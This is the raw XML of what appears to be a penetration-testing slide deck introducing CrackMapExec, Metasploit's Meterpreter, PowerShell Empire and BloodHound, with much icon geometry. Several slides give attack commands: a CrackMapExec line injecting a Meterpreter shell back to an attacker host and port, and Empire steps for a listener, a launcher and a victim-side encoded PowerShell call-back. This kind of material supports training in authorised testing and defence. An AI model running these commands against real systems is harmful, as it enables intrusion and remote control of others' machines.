            <a:ext cx="12196660" cy="2393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E1F2E07-CB4F-457E-98A9-145BE9237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094" y="307731"/>
            <a:ext cx="7542713" cy="3997637"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="AutoShape 2" descr="https://docs.google.com/a/secureideas.com/drawings/d/sUlUdcSU2eruzFPIJvo7mFg/image?w=544&amp;h=280&amp;rev=19&amp;ac=1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{74503576-5180-470F-9F38-B250494407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05200" y="2095500"/>
            <a:ext cx="5181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607EE-07D0-4DE2-BAF0-03767DA4E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Penetration testing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3114261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331846" y="674835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22346" y="1259758"/>
            <a:ext cx="26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CrackMapExec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 swiss army knife for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pentesting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> networks.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github.com/byt3bl33d3r/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CrackMapExec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776996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Meterpreter Shells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94220D-FD0B-4B97-BDA4-5ABE8FAC5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607577" cy="46933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crackmapexec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> &lt;target subnet&gt; -u &lt;username&gt; -p &lt;password&gt; -M </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>metinject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -o LHOST=192.168.10.3 LPORT=8443</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1844209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331846" y="674835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22346" y="1259758"/>
            <a:ext cx="2669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Meterpreter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Penetration Testing Framework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github.com/rapid7/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-framework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526297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Meterpreter -- </a:t>
            </a:r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msfconsole</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3500" b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2FD23E-F734-478C-84DC-D5FB2EC0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027" y="1244357"/>
            <a:ext cx="6739295" cy="42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27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Empire is a pure PowerShell post-exploitation agent built on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cryptologically</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-secure communications and a flexible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3574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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Listeners</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Stagers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Agents</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Modules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328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6465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 -- Installation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$ git clone https://github.com/EmpireProject/Empire</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>$ cd Empire</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>$ ./setup/install.sh</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>$./empire</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3532628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657" y="1237687"/>
            <a:ext cx="7422823" cy="298204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AutoNum type="arabicParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attack Machine sets up a listener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uselistener</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> &lt;tab&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>uselistener</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> http</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>listeners/http&gt; info</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>listeners/http&gt; execute</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>listeners/http&gt; back</a:t>
            </a:r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EDF383-9E4D-42B0-B7EC-90A0DFB43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33" y="1882515"/>
            <a:ext cx="2219635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944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657" y="1158428"/>
            <a:ext cx="7422823" cy="298204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2) Attack Machine generates code for a launcher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usestager</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> &lt;tab&gt;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usestager</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> multi/launcher</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>stager/multi/launcher &gt; info</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Stager/multi/launcher &gt; set Listener http</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>stager/multi/launcher &gt; generate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4A31067-F534-40FA-9D91-6D5538C60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41" y="3961566"/>
            <a:ext cx="3629532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39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3) Victim runs launcher code, containing a stager and connects back to Attack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PS&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Powershell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>noP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> –w 1 –enc ENSDCSDBHSOSDGHWRHSDBFVJ XFGJFGFGBQWSEDCGGBIKMLMNBFCDSSEFCDFGBGYUJMIOJBGVCXDFVBHGFXFVXDGBJGUJHUKIUIKHYUYTFTRFDSWESAWEDCVBNJMJHGYHBDSFVGHBGHUYUJHUKIKOPLKJHGFCVBVCFGVXDASASFCDFGBVFGHGFCVBHGFFGVCXSDSZXDFRFVCFGHNKIUHJNBVGJBRDDSDRTGVCVHBVCDSXAWYUUIKJNBVGHBVCFDDFHGCFGVHHBVCFGHBCFGB==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0F087C5-1AA8-4022-890B-2FFD6BC22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378" y="4424597"/>
            <a:ext cx="278168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676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4) Attack Machine sees Agent connection and can start the fun!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&gt;interact 34AYPCZ5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sysinfo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6ECD5F0-4C2B-46BF-B358-EFA945C3E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353" y="2226659"/>
            <a:ext cx="3972479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67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PSEmpire</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800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PowerShell post-exploitation agent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EmpireProject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/Empire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382829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 err="1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Powershell</a:t>
            </a:r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 Empire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4) Attack Machine sees Agent connection and can start the fun!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&gt;interact 34AYPCZ5</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sysinfo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A screenshot of a social media post with text and a white shirt&#10;&#10;Description generated with high confidence">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{52683CCF-7B41-4534-8ACB-EFCEA35C6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48" y="2183114"/>
            <a:ext cx="4143953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2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660" y="4738255"/>
            <a:ext cx="12196660" cy="2119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589968" y="5049530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296311" y="5634453"/>
            <a:ext cx="837760" cy="1105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40197" y="5591736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Project Tools</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3125127" y="5311287"/>
            <a:ext cx="71094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XMIND</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="39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921B6912-CB79-054E-9AB8-FD8B19C11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136"/>
            <a:ext cx="12192000" cy="4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430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Bloodhound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Six Degrees from Domain Admin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BloodHoundAD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BloodHound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25458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Bloodhound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422823" cy="29820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Uses graph theory to identify relationships in Active Directory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Ingests data from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Powershell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> query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3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Bloodhound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Six Degrees from Domain Admin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BloodHoundAD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BloodHound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25458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Bloodhound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45192F1-FFF3-4AE3-ACE7-E7E60AFAC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844" y="1509492"/>
            <a:ext cx="7352885" cy="3789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Install database like neo4j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Sharphound.ps1 from AD bound machine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Launch Bloodhound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Import CSVs</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22557839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A50886C-7B80-5D47-B5B6-4240F765D5A5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-8174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5E730E-11B2-2946-BB75-D7E7850AAABC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E45669-BE17-7041-9545-1781AFE018AA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740AE6-FD56-BE4D-B17F-6C9C9C1B7750}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="130315" y="1247882"/>
            <a:ext cx="237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Bloodhound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5686DE-BC8A-6141-8343-D1A1B3EB6686}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="275382" y="2728710"/>
            <a:ext cx="275048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Six Degrees from Domain Admin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github.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>BloodHoundAD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BloodHound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558C56-82EF-4859-A6F0-5448863A6471}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3864844" y="197673"/>
            <a:ext cx="25458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Bloodhound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6537D-DD2E-49C0-A1B2-8DD11D9C8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314" y="828615"/>
            <a:ext cx="6690753" cy="476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4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3534" y="277339"/>
            <a:ext cx="272382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>
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Roboto" charset="0"/>
                <a:ea typeface="Roboto" charset="0"/>
                <a:cs typeface="Roboto" charset="0"/>
              </a:rPr>
              <a:t>Vector Icons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5529665" y="1079067"/>
            <a:ext cx="1129255" cy="594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latin typeface="Roboto Regular" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Shape 2525"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="880859" y="207029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" name="Shape 2526"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1414120" y="207029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6" name="Shape 2527"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1947381" y="207029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7" name="Shape 2528"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2518732" y="207029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8" name="Shape 2529"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3051993" y="207029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9" name="Shape 2530"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3572557" y="2070298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0" name="Shape 2531"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4105818" y="207029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1" name="Shape 2532"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4639079" y="207029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2" name="Shape 2533"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5172341" y="207029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3" name="Shape 2534"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5705602" y="2070298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4" name="Shape 2535"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="906252" y="2603559"/>
            <a:ext cx="228541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5" name="Shape 2536"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1414120" y="26035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" name="Shape 2537"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1972774" y="2603559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" name="Shape 2538"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2506035" y="2603559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" name="Shape 2539"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3013903" y="2647998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" name="Shape 2540"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3547164" y="26035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0" name="Shape 2541"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4105818" y="2628953"/>
            <a:ext cx="228541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1" name="Shape 2542"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4613686" y="26035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2" name="Shape 2543"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5146947" y="26035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3" name="Shape 2544"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5680208" y="260355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4" name="Shape 2545"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="880859" y="313682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5" name="Shape 2546"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1414120" y="316221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6" name="Shape 2547"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1947381" y="313682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7" name="Shape 2548"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2480642" y="3244742"/>
            <a:ext cx="279328" cy="634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8" name="Shape 2549"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3013903" y="313682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39" name="Shape 2550"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3547164" y="313682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0" name="Shape 2551"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4080425" y="313682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1" name="Shape 2552"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4613686" y="314951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2" name="Shape 2553"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5146947" y="314951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3" name="Shape 2554"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5680208" y="3149517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4" name="Shape 2555"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="880859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5" name="Shape 2556"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1414120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6" name="Shape 2557"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1947381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7" name="Shape 2558"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2480642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8" name="Shape 2559"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3013903" y="369547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49" name="Shape 2560"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3547164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0" name="Shape 2561"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4080425" y="369547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1" name="Shape 2562"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4613686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2" name="Shape 2563"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5146947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3" name="Shape 2564"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5680208" y="367008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4" name="Shape 2565"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="880859" y="4228736"/>
            <a:ext cx="279328" cy="22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5" name="Shape 2566"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1414120" y="4228736"/>
            <a:ext cx="279328" cy="22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6" name="Shape 2567"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1947381" y="4203342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7" name="Shape 2568"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2480642" y="4203342"/>
            <a:ext cx="279328" cy="2793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8" name="Shape 2569"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3013903" y="4203342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5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59" name="Shape 2570"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3547164" y="4209691"/>
            <a:ext cx="279328" cy="2729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0" name="Shape 2571"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4080425" y="42033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1" name="Shape 2572"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4613686" y="42033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2" name="Shape 2573"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5146947" y="420334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3" name="Shape 2574"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5692905" y="4203343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4" name="Shape 2575"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="880859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5" name="Shape 2576"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1414120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7"/>
                  <a:pt x="8874" y="18820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9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6"/>
                  <a:pt x="18456" y="4347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8"/>
                  <a:pt x="7856" y="16572"/>
                  <a:pt x="7863" y="17142"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7861" y="17155"/>
                  <a:pt x="7855" y="17168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6" name="Shape 2577"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1960077" y="4736604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1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6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2"/>
                  <a:pt x="5471" y="16691"/>
                  <a:pt x="4860" y="16691"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2700" y="16691"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1209" y="16691"/>
                  <a:pt x="0" y="17790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5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0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7" name="Shape 2578"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2531429" y="4736604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8"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="20057" y="1878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8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2"/>
                  <a:pt x="7815" y="16691"/>
                  <a:pt x="6943" y="16691"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="3857" y="16691"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1727" y="16691"/>
                  <a:pt x="0" y="17790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5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8" name="Shape 2579"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3013903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5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69" name="Shape 2580"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3547164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0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6037" y="13240"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6275" y="12602"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7364" y="9683"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8452" y="12602"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8690" y="13240"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11820" y="13240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8"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="16200" y="6883"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15619" y="7308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7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16200" y="2793"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16754" y="4267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8"/>
                  <a:pt x="16781" y="7308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2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2"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="18409" y="6382"/>
                  <a:pt x="21600" y="3922"/>
                  <a:pt x="21600" y="392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0" name="Shape 2581"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4080425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1" name="Shape 2582"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4613686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1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1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2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5"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4909" y="14728"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4374" y="16155"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2945" y="16155"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4106" y="17048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8"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6873" y="16155"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="6873" y="16155"/>
                  <a:pt x="5445" y="16155"/>
                  <a:pt x="5445" y="16155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7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7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6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6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0"/>
                  <a:pt x="8836" y="16691"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8836" y="16962"/>
                  <a:pt x="9056" y="17182"/>
                  <a:pt x="9327" y="17182"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="18164" y="17182"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="18435" y="17182"/>
                  <a:pt x="18655" y="16962"/>
                  <a:pt x="18655" y="16691"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18655" y="16420"/>
                  <a:pt x="18435" y="16200"/>
                  <a:pt x="18164" y="16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2" name="Shape 2583"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5146947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90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1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90"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9962" y="13890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6"/>
                  <a:pt x="11155" y="21600"/>
                  <a:pt x="11291" y="21600"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11427" y="21600"/>
                  <a:pt x="11549" y="21546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9"/>
                  <a:pt x="11291" y="12764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3" name="Shape 2584"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5680208" y="473660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6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90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6"/>
                  <a:pt x="10174" y="21600"/>
                  <a:pt x="10309" y="21600"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10445" y="21600"/>
                  <a:pt x="10567" y="21546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8"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18511" y="12908"/>
                  <a:pt x="8693" y="3090"/>
                  <a:pt x="8693" y="3090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5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1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6"/>
                  <a:pt x="19145" y="11782"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="19145" y="12053"/>
                  <a:pt x="19366" y="12273"/>
                  <a:pt x="19636" y="12273"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="19772" y="12273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3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8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4" name="Shape 2585"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6276953" y="207030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7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7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7"/>
                  <a:pt x="15638" y="4614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4"/>
                  <a:pt x="2760" y="3757"/>
                  <a:pt x="1200" y="2579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29"/>
                  <a:pt x="10469" y="4909"/>
                  <a:pt x="10800" y="4909"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11131" y="4909"/>
                  <a:pt x="11400" y="5129"/>
                  <a:pt x="11400" y="5400"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11400" y="5672"/>
                  <a:pt x="11131" y="5891"/>
                  <a:pt x="10800" y="5891"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
